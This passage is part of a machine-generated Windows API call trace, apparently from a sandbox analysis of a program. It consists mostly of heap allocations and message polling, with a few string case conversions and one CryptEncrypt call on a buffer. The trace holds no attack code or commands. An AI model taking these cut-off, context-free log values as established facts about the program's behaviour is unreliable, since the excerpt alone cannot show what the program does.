hHeap=0x25c0000) returned 1 [0165.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0165.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0165.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0165.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0165.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0165.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0165.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0165.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0165.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0165.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0165.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0165.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0165.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0165.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.940] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.940] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.940] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0165.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.941] CharLowerBuffW (in: lpsz="byte[79528]", cchLength=0xb | out: lpsz="byte[79528]") returned 0xb [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0165.941] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0165.942] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0165.943] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.943] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.943] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.943] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.943] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.943] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0165.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0165.944] CryptEncrypt (in: hKey=0xaa55e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d8fa0*, pdwDataLen=0x8bef68*=0x136a0, dwBufLen=0x136a8 | out: pbData=0x34d8fa0*, pdwDataLen=0x8bef68*=0x136a8) returned 1 [0165.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0165.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0165.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0165.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0165.945] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0165.946] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.946] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0165.946] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.947] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.947] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0165.947] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0165.947] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0165.947] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.947] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0165.947] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.947] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0165.948] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0165.948] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.948] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0165.948] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.948] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.948] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.948] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.948] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.949] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.949] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.949] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.949] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.949] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.949] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.949] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0165.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.954] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.954] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.954] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.956] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0165.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.956] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0165.956] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0165.957] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 